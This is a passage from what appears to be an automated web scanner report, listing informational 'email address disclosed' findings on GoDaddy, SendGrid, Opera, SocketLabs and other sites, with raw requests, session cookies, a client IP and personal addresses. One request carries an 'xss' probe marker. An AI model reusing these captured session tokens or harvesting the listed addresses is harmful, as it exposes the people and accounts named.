HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"aeffd3c6b449e3ce04e736ab952c62; expires=Sun, 15-Sep-2013 15:26:50 GMT; path=/%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A2%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A1000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%5C%2Fsmtp-relay-service.html%3Fgclid%3DCKqV0feJoqsCFQdzgwod6j2wjw%22%2C%22timeElapsed%22%3A0.02%7D; path=/.userAgent) && !(/Chrome/.test(navigator.userAgent))) {ByTagName( 'BODY' )[ 0 ];...[SNIP]... :false,coreloaded:false,chatloaded:false,eventloaded:false,findopTM:null,attach:0,init_done:0,paused:0,opOffline:0,c2cOffline:1,opWatching:0,opBusy:0,on_call:0,virtualOP:0,opList:["idzmailjetc@iadvize.com ","idzelie@iadvize.com "],phoneDisplayed:0,butMessage:false,mousetrack_interval:null,curlang:'en',chaturl:'http://livechat.iadvize.com/',static_url:'http://static.iadvize.com/',bosh_url:'http://www.iadvize.com/http-bind',web...[SNIP]... watch.999@iadvize.com ';ventFunc = function() {'IADVIZE SCRIPT ALREADY LOADED');...[SNIP]...
19.12. https://login.secureserver.net/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.secureserver.net
Path:
/
Issue detail
The following email address was disclosed in the response:
Request
GET /?app=wbe HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... john@domain.com </p>...[SNIP]...
19.13. http://media.ubm.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://media.ubm.com
Path:
/
Issue detail
The following email addresses were disclosed in the response:communications@ubm.com nicola.smith@citigatedr.co.uk
Request
GET / HTTP/1.1/people/jobshop.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.6.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... communications@ubm.com ">communications@ubm.com </a>...[SNIP]... communications@ubm.com ">communications@ubm.com </a>...[SNIP]... nicola.smith@citigatedr.co.uk ">nicola.smith@citigatedr.co.uk </a>...[SNIP]...
19.14. https://my.opera.com/community/signup/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://my.opera.com
Path:
/community/signup/
Issue detail
The following email address was disclosed in the response:
Request
GET /community/signup/?username=xss&email=xss%40xss.cx&utm_source=&referrer=&error=Wrong-text-entered HTTP/1.1/community/signup/?s_ref=home/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=218314117.1470107793.1316208001.1316208001.1316208001.1; __utmb=218314117.1.10.1316208001; __utmc=218314117; __utmz=218314117.1316208001.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMzowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... xss@xss.cx " id="enter-email" required="required" title="Please enter a valid e-mail address to complete the registration process." data-msg-invalid="Please enter a valid e-mail address to complete the registrati...[SNIP]...
19.15. https://mya.godaddy.com/Default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/Default.aspx
Issue detail
The following email addresses were disclosed in the response:YourEmail@YourWebsite.com marketing@godaddy.com sitesuggestions@godaddy.com
Request
GET /Default.aspx?idpinfo=none&myaurl=%2fdefault.aspx&ci=13025 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d
Response
HTTP/1.1 200 OKbkgocvhqhmjwbmindlamiea; domain=godaddy.com; expires=Thu, 16-Sep-2021 18:08:24 GMT; path=/rceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:24 GMT; path=/&referrer=&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&ci=13025&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... _signup()',event);" value="YourEmail@YourWebsite.com " onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com ?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com </a>...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com ?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com </a>...[SNIP]...
19.16. https://mya.godaddy.com/myrenewals/myRenewals.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://mya.godaddy.com
Path:
/myrenewals/myRenewals.aspx
Issue detail
The following email addresses were disclosed in the response:YourEmail@YourWebsite.com marketing@godaddy.com sitesuggestions@godaddy.com
Request
GET /myrenewals/myRenewals.aspx?ci=11279&tab=products HTTP/1.1/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; ASP.NET_SessionId=sxaobr55fgak5g55bzrndx2d; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:09:07 GMT; path=/&referrer=https://idp.godaddy.com/login.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181&redirect=false&target=http%3a%2f%2fwww.godaddy.com%2foffers%2fhot-deals2.aspx&sitename=mya.godaddy.com&page=/myrenewals/myRenewals.aspx&server=M1PWMYAWEB003&status=200 OK&querystring=ci=11279&tab=products&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=4d9fa55d-454a-463a-ad89-702facb7913c&referringdomain=&split=45; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... _signup()',event);" value="YourEmail@YourWebsite.com " onfocus="this.value=''; this.className='txt_email ty in inp_iphone';" />...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:sitesuggestions@godaddy.com ?subject=Go Daddy Website Suggestions','40117','eMail','Popup')">sitesuggestions@godaddy.com </a>...[SNIP]... -decoration:underline;font-size:12px;" href="javascript:pcj_fbiLink('mailto:marketing@godaddy.com ?subject=Go Daddy Marketing Opportunity','eMail','Popup')">marketing@godaddy.com </a>...[SNIP]...
19.17. http://sendgrid.com/features
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sendgrid.com
Path:
/features
Issue detail
The following email address was disclosed in the response:
Request
GET /features HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1; symfony=2620e59692610735faaba9cd7ccd2c6f:85ae52515893387e57b673877b205ea2bae4ed49; __qca=P0-572909897-1316204950437; _mkto_trk=id:467-KXI-123&token:_mch-sendgrid.com-1316204836485-43033; __utma=111872475.871024225.1316204951.1316204951.1316204951.1; __utmb=111872475.1.10.1316204951; __utmc=111872475; __utmz=111872475.1316204951.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set); SnapABugRef=http%3A%2F%2Fsendgrid.com%2Fpricing.html%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ%20http%3A%2F%2Flanding.sendgrid.com%2Fsmtp-with-bullet-points%2F%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ; SnapABugHistory=1#; SnapABugVisit=8d68486b-56f8-4224-9862-8ffa3106ecfb-578112706076353; km_ai=n1EPXU78Lr4accy0ZIHA%2Fx7iGbI%3D; km_lv=1316204954; km_uq=; _chartbeat2=al0oan3xoujtpzgt.1316204955548
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... support@sendgrid.com </span>...[SNIP]...
19.18. http://sendgrid.com/pricing.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sendgrid.com
Path:
/pricing.html
Issue detail
The following email address was disclosed in the response:
Request
GET /pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1.com/smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3&token:_mch-sendgrid.com-1316204836485-43033; __utma=139434414.731002222.1316204836.1316204836.1316204836.1; __utmb=139434414.2.10.1316204836; __utmc=139434414; __utmz=139434414.1316204836.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ptca=111872475.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... support@sendgrid.com </span>...[SNIP]...
19.19. https://sendgrid.com/user/signup/package/44
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://sendgrid.com
Path:
/user/signup/package/44
Issue detail
The following email address was disclosed in the response:
Request
GET /user/signup/package/44 HTTP/1.1/pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1; symfony=2620e59692610735faaba9cd7ccd2c6f:85ae52515893387e57b673877b205ea2bae4ed49; __qca=P0-572909897-1316204950437; _mkto_trk=id:467-KXI-123&token:_mch-sendgrid.com-1316204836485-43033; __utma=111872475.871024225.1316204951.1316204951.1316204951.1; __utmb=111872475.1.10.1316204951; __utmc=111872475; __utmz=111872475.1316204951.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set); SnapABugRef=http%3A%2F%2Fsendgrid.com%2Fpricing.html%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ%20http%3A%2F%2Flanding.sendgrid.com%2Fsmtp-with-bullet-points%2F%3Fgclid%3DCPWo1PSJoqsCFRRSgwod8HVslQ; SnapABugHistory=1#; SnapABugVisit=8d68486b-56f8-4224-9862-8ffa3106ecfb-578112706076353; km_ai=n1EPXU78Lr4accy0ZIHA%2Fx7iGbI%3D; km_lv=1316204954; km_uq=; _chartbeat2=al0oan3xoujtpzgt.1316204955548
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... support@sendgrid.com </span>...[SNIP]...
19.20. http://shoprunner.force.com/content/JsContentElementsDRGS
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shoprunner.force.com
Path:
/content/JsContentElementsDRGS
Issue detail
The following email address was disclosed in the response:MemberServices@ShopRunner.com
Request
GET /content/JsContentElementsDRGS HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK-------------------------------- */...[SNIP]... MemberServices@ShopRunner.com ">MemberServices@ShopRunner.com </a>...[SNIP]... MemberServices@ShopRunner.com ">MemberServices@ShopRunner.com </a>...[SNIP]... MemberServices@ShopRunner.com ">MemberServices@ShopRunner.com </a>...[SNIP]... MemberServices@ShopRunner.com ">MemberServices@ShopRunner.com </a>...[SNIP]...
19.21. https://support.socketlabs.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/
Issue detail
The following email address was disclosed in the response:
Request
GET / HTTP/1.1/faq//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... .socketlabs.com/index.php/Knowledgebase/Article/View/45/2/why-am-i-seeing-messages-from-my-account-going-to-filtersocketlabscom">Why am I seeing messages from my account going to filter@socketlabs.com </a>...[SNIP]...
19.22. https://support.socketlabs.com/index.php/Core/Default/Compressor/js/jquery:jqueryplugins:jqueryui:colorpicker:coresc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Core/Default/Compressor/js/jquery:jqueryplugins:jqueryui:colorpicker:coresc
Issue detail
The following email addresses were disclosed in the response:bdillard@pathf.com diego@fyneworks.com letssurf@gmail.com maggie@filamentgroup.com scott@filamentgroup.com stanlemon@mac.com
Request
GET /index.php/Core/Default/Compressor/js/jquery:jqueryplugins:jqueryui:colorpicker:coresc HTTP/1.1.socketlabs.com/;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a%3A1%3A%7Bs%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response
HTTP/1.1 200 OK...[SNIP]... |add|appendChild|mousedown|mouseup||keydown|keypress|unbind'.split('|'),0,{}));diego@fyneworks.com /licenses/mit-license.php/licenses/gpl.html/project/Mult...[SNIP]... letssurf@gmail.com , http://www.jdempster.com/category/jquery/cookieJar/)...[SNIP]... |fadeIn|removeAttribute|log|error|505050|webkit|removeAttr|404040|constants'.split('|'),0,{}))bdillard@pathf.com | http://blogs.pathf.com/agileajax/.org...[SNIP]... maggie@filamentgroup.com ) and Scott Jehl (scott@filamentgroup.com ).com.com/lab/jquery_ipod_style_drilldown_menu/...[SNIP]... stanlemon@mac.com >...[SNIP]...
19.23. http://thehackernews.com/feeds/posts/summary
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://thehackernews.com
Path:
/feeds/posts/summary
Issue detail
The following email addresses were disclosed in the response:anonymous_indian@hushmail.me answerman@gmail.com antisec@gmx.com noreply@blogger.com
Request
GET /feeds/posts/summary?alt=json-in-script&callback=showpageCount&max-results=99999 HTTP/1.1;q=0.3.1834991741.1316213726.1316213726.1316213726.1; __utmb=93595608.1.10.1316213726; __utmc=93595608; __utmz=93595608.1316213726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OKhdVEUQ.""1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$georss":"http://www....[SNIP]... "alternate","type":"text/html","href":"http://thehackernews.com/"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"}],"author":[{"name":{"$t":"Team : Evilhackerz"},"email":{"$t":"noreply@blogger.com "}}],"generator":{"version":"7.00","uri":"http://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"2017"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"99999"},"en...[SNIP]... -32-million-from-us.html","title":"SpyEye Trojan stole $3.2 million from US victims,Android users will be next target !"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-SozgZ8W8HII/TnOKbNxKPcI/AAAAAAAAC-k/A2wUIuePVcw/s72-c/AndroidInfected-550x412.jpg","height":"72","...[SNIP]... /thehackernews.com/2011/09/godaddy-websites-compromised-with.html","title":"GoDaddy websites Compromised with Malware"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-sMxWJBTSHpA/TnOJcW1dkhI/AAAAAAAAC-g/Wwg1vF0oC2o/s72-c/godaddy-servers-hacked.jpg","height":"72","w...[SNIP]... -v006-worlds-fastest.html","title":"oclHashcat-plus v0.06 - Worlds fastest md5crypt, phpass, mscash2 and WPA/WPA2 cracker"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://2.bp.blogspot.com/-AWMtdMMJXlY/TnOFVg0e8GI/AAAAAAAAC-c/EKQSTuBPS6o/s72-c/oclhashcat-plus.png","height":"72","width":"...[SNIP]... /09/wavsep-103-web-application.html","title":"WAVSEP 1.0.3 ... Web Application Vulnerability Scanner Evaluation Project"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-JYNxHu4tFB4/TnLPN5nSj7I/AAAAAAAAC-Y/bxCJnacekIw/s72-c/Untitled.png","height":"72","width":"72"}},{...[SNIP]... -antivirus-released.html","title":"Balaji Plus Cloud Antivirus Released - Mix of 32 antivirus Engines for ultra Protection"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://1.bp.blogspot.com/-ZbVh0Djn8T8/TnLNQWLBMpI/AAAAAAAAC-U/-hTQD8IsObo/s72-c/Untitled-3+copy.jpg","height":"72","width":"...[SNIP]... kernews.com/2011/09/thc-hydra-v70-new-version-released-for.html","title":"THC-HYDRA v7.0 new version released for Download"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-UPdHdPAe1_0/TnFI9TMnUQI/AAAAAAAAC-Q/OWy7uC2GDhs/s72-c/6cce61d0e149ded800658df34cc65859.png","heigh...[SNIP]... -bittorrent-sites-hacked-spread.html","title":"uTorrent \u0026 BitTorrent Sites Hacked, Spread Security Shield Malware"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://4.bp.blogspot.com/-HHXEdcGfSQM/TnESUBZBNYI/AAAAAAAAC-M/ACC0aHOLjmg/s72-c/bBoVvbFeWRneFBWENoSxfDl72eJkfbmt4t8yenImKBU8...[SNIP]... -backtrack-5-wireless-penetration.html","title":"Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://2.bp.blogspot.com/-sZmy-GYwaaM/TnDzZ-3-xVI/AAAAAAAAC-E/zseWYDx7xsc/s72-c/5580OS_Backtrack+5+Wireless+Penetration.jpg"...[SNIP]... ckernews.com/2011/09/mcafee-deepsafe-anti-rootkit-security.html","title":"McAfee DeepSAFE - Anti-rootkit Security Solution"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://1.bp.blogspot.com/-nH9c1Pt2JkQ/TnD1E-A_QRI/AAAAAAAAC-I/CPkeJCOY7uU/s72-c/mcafee-security-i.jpg","height":"72","width"...[SNIP]... /thehackernews.com/2011/09/presidential-website-president-of.html","title":"Presidential website president of Bolivia hacked"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://4.bp.blogspot.com/-X2MyWp4tYn0/TnDtdoRJY0I/AAAAAAAAC98/qXcEmPKnukk/s72-c/Untitled.jpg","height":"72","width":"72"}},{...[SNIP]... /top100-arena-gaming-sites-network.html","title":"Top100 Arena Gaming Sites Network hacked By ACA [Albanian Cyber Army]"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-x1zhX0lFG_0/Tm-3U1nF76I/AAAAAAAAC94/pvQHEyCKyLs/s72-c/j6lg7b.png","height":"72","width":"72"}},{"i...[SNIP]... /2011/09/opiran-new-press-release-for-23.html","title":"#Opiran new press release for 23 September by Anonymous Hackers"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://4.bp.blogspot.com/-Yoo5MpW62Ak/Tm-iVxFbFKI/AAAAAAAAC90/bSp1U0gljjw/s72-c/2yy8i1j.jpg","height":"72","width":"72"}},{"...[SNIP]... "http://thehackernews.com/2011/09/security-onion-livedvd-download.html","title":"The Security Onion LiveDVD - Download"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://3.bp.blogspot.com/-kqKucLOfM-M/Tm-hoO2O19I/AAAAAAAAC9w/6hpCPVllfb4/s72-c/security-onion.png","height":"72","width":"7...[SNIP]... /thehackernews.com/2011/09/brucon-belgiums-first-security.html","title":"BruCON ... Belgium...s First Security Conference"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://1.bp.blogspot.com/-HJateiXlxPQ/Tm-gMfuaCuI/AAAAAAAAC9s/tTjycbeIDBg/s72-c/logo-brucon-300.jpg","height":"72","width":"...[SNIP]... "http://thehackernews.com/2011/09/hook-analyser-malware-tool-released.html","title":"Hook Analyser Malware Tool Released"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://4.bp.blogspot.com/-07ZlxeLxN6A/Tm-cXjwga8I/AAAAAAAAC9o/n1xpc6a1-3A/s72-c/Dump-all.PNG","height":"72","width":"72"}},{...[SNIP]... kernews.com/2011/09/panda-security-pakistan-domain-hacked.html","title":"Panda Security (Pakistan domain) hacked by X-NerD"}],"author":[{"name":{"$t":"THN Reporter"},"email":{"$t":"noreply@blogger.com "}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http://2.bp.blogspot.com/-kiykk6KGPcI/Tm0erYRZo7I